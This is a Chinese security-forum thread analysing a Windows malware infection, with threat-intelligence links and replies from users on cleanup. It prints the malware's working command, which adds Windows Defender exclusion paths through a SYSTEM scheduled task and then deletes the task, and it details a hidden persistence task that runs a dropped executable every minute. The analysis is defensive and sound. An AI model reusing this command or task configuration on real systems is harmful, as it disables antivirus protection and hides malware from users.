cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%USERPROFILE%\Documents" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F

"C:\Users"

"C:\ProgramData"

"C:\Program Files (x86)"

"C:\Users\Public\eUCkvd"

"%USERPROFILE%\Documents"

这些命令是典型的修改 Windows Defender 排除路径的操作,目的是让 Windows Defender 不再扫描指定目录,从而绕过或削弱杀毒软件检测。
它们通过“计划任务”以 SYSTEM 最高权限执行,并在执行后立即删除任务,以清理痕迹。

计划任务

### 一、注册信息(RegistrationInfo)

- 任务描述:无(字段为空)
- 任务路径:`\`(位于任务计划程序库的根目录)

### 二、触发条件(Triggers)

共配置 2 个触发器,满足任一条件即触发任务执行:

1. **登录触发器(LogonTrigger)**
   - 状态:已启用
   - 触发时机:用户登录系统时自动执行

2. **时间触发器(TimeTrigger)**
   - 状态:已启用
   - 起始基准时间:`2009-04-23 00:00:00`
   - 重复周期:每 1 分钟执行一次(格式 `PT1M`)
   - 循环规则:无停止时限,会持续循环执行

### 三、运行身份(Principals)

- 身份标识:`Author`
- 运行用户组:`S-1-5-32-545`(对应系统内置的 **Users 用户组**)
- 权限等级:`HighestAvailable`(以当前用户可用的最高权限运行,即管理员权限)

### 四、任务运行设置(Settings)

表格

| 配置项 | 取值 | 实际含义 |
| --- | --- | --- |
| 多实例策略 | IgnoreNew | 任务已在运行时,直接忽略新的启动请求 |
| 电池供电启动 | DisallowStartIfOnBatteries = false | 笔记本使用电池供电时也允许启动任务 |
| 切电池时停止 | StopIfGoingOnBatteries = true | 设备切换到电池供电时,立即停止任务 |
| 强制终止权限 | AllowHardTerminate = false | 不允许系统强制结束该任务进程 |
| 错过补执行 | StartWhenAvailable = true | 错过触发时间后,系统就绪时立即补跑 |
| 网络依赖 | RunOnlyIfNetworkAvailable = false | 无需网络连接即可运行 |
| 界面可见性 | Hidden = true | 在任务计划程序图形界面中隐藏该任务 |
| 手动启动 | AllowStartOnDemand = true | 允许用户手动触发任务运行 |
| 任务总开关 | Enabled = true | 任务整体处于启用状态 |
| 空闲条件 | RunOnlyIfIdle = false | 不要求系统处于空闲状态才运行 |
| 唤醒运行 | WakeToRun = false | 不会唤醒睡眠中的计算机执行任务 |
| 执行时长限制 | ExecutionTimeLimit = PT0S | 无执行时间上限,进程可永久运行 |
| 进程优先级 | Priority = 4 | 正常优先级(范围 0~10,0 为最高优先级) |

空闲状态子规则:

- 系统空闲期结束时停止任务:是
- 系统再次进入空闲时重启任务:否

### 五、执行操作(Actions)

任务触发后执行的核心动作:

- 操作类型:启动外部程序(`Exec`)
- 目标程序路径:`C:\Users\Public\Bkx1av\eDRUae.exe`
- 程序工作目录:`C:\Users\Public\Bkx1av\`
- 命令行启动参数:无

> 补充特征提示:该任务具备「界面隐藏、每分钟高频执行、管理员权限、无运行时限、禁止系统强制终止」等特征,且程序路径位于公共用户目录、文件名无明确业务语义,这类配置常见于恶意软件实现系统持久化的手段,建议对目标 exe 文件进行安全校验。

外壳站群
https://s.threatbook.com/report/url/ad44aad7900c38fd2e0ab9e837c1cee4
https://s.threatbook.com/report/url/bbca6e7ee66e2ffad07b504aa605a529

落地通信
https://s.threatbook.com/report/url/6da3f92f64b094cd3c44eaa5b2eb3e82
https://s.threatbook.com/report/url/bf3641ca88e02cddca053b1c65b8c9dc

落地中继
https://s.threatbook.com/report/url/cd2e3dfe1a22e443f5168f83d093d718
https://s.threatbook.com/report/url/3bb188ac541188419501bc9755fb2426

落地后台
https://s.threatbook.com/report/url/0c05472d46527af9da348b9eb80b3c74

下载赋值
https://s.threatbook.com/report/url/e027c21cecbaf39b691a88187473220e

恶意载荷
https://s.threatbook.com/report/url/446a728ae59b1a272046bbd33c84f846
https://s.threatbook.com/report/url/8359e81ac319d062a90c28fdd2accdd1
https://s.threatbook.com/report/url/5301d041df6e0f04e806e2cebffa0f19
https://s.threatbook.com/report/url/dd7b5d96d49936147aa21f571e0633cb
https://s.threatbook.com/report/url/d6a8156202507ede072025ae8d4cb00e
https://s.threatbook.com/report/url/a91329898e3d2177816c872a20b3fd86
https://s.threatbook.com/report/url/a06f2fd147d11639103e8d79679bc4b4
https://s.threatbook.com/report/url/767475c3609d90d469de46f1900c7b18

样本情况
https://virusscan.jotti.org/zh-CN/filescanjob/d6nl9qzw4l
https://tix.qq.com/search/single?keyword=1017ed199f9158b4a28c250a0bd00927
https://www.maldun.com/analysis/YXNkZmRzZmFkc2YxMjkyNDA2ZHNmYXNkZmFzZGY=/
https://sandbox.ti.qianxin.com/sandbox/page/detail?type=file&id=AaAxzVcBmTITNisAOUD4
https://sandbox.dbappsecurity.com.cn/report/a8a8829d-7141-47d9-a5a0-40c1044184b9/flat
https://fenxi.antiy.cn/#/entirety/file/searchResult?hash=1017ed199f9158b4a28c250a0bd00927
https://virus.cverc.org.cn/#/entirety/file/searchResult?hash=1017ed199f9158b4a28c250a0bd00927
https://www.virscan.org/report/9868ba2e4c6fc4e4a884e1621ae23764f4fa677911a7191f21763258a1dff14e
https://www.virustotal.com/gui/file/9868ba2e4c6fc4e4a884e1621ae23764f4fa677911a7191f21763258a1dff14e
https://s.threatbook.com/report/file/9868ba2e4c6fc4e4a884e1621ae23764f4fa677911a7191f21763258a1dff14e
https://sandbox.qianxin.com/tq/report/toNewReport.do?rid=3e9c6df2031b263b1b84b315d4bfe9bf&sk=71352832
https://opentip.kaspersky.com/9868BA2E4C6FC4E4A884E1621AE23764F4FA677911A7191F21763258A1DFF14E/results?tab=upload

推荐
qxyokok 发表于 2026-8-27 09:49
我也是8月18日中的这个毒,过了三天21号才发现,自己全部账号都被盗了,邮箱不停的提示账号异常登录、账号异常操作、账号锁定等消息。我是先用gpt修复了一下WD状态,然后安装诺顿全盘杀毒,最后手动改了任务计划、组策略、注册表并手工搜索删除了一些残留的文件,不知道这样是不是安全了。因为我电脑上装了一些单次授权的工业软件,厂家都联系不上了,这个电脑是主力工作电脑且不能重装。不知道现在我这个电脑是否可以安全使用了,您还有什么建议么?

免费评分

参与人数 1吾爱币 +1 热心值 +1 收起 理由
mingtianj + 1 + 1 我很赞同!

查看全部评分

沙发
 楼主| 汤圆 发表于 2026-8-24 01:50 |楼主
之前装了AppControl看到新增文件顺手都给禁止运行了。

PixPin_2026-08-24_01-48-27.png (146.57 KB, 下载次数: 0)

PixPin_2026-08-24_01-48-27.png
3#
V3XP 发表于 2026-8-24 08:52
有没有源码
4#
mgwlls 发表于 2026-8-24 09:31
360系统急救箱全盘强力模式扫下,看有没有残留
5#
ikochina 发表于 2026-8-24 09:35
解压样本,智甲个人版隔离,报win32.ravartar
6#
Jx29 发表于 2026-8-24 09:41
汤圆 发表于 2026-8-24 01:50
之前装了AppControl看到新增文件顺手都给禁止运行了。

这个截图是啥软件?
7#
shakele 发表于 2026-8-24 09:44
现在银狐也太多了吧
8#
hdy01 发表于 2026-8-24 10:43
是啥软件
9#
jackchengyu 发表于 2026-8-24 10:49

AppControl
10#
wu20080808 发表于 2026-8-24 10:49
怎么判断电脑上是否中这病毒?
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - 52pojie.cn ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2026-9-6 03:37

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表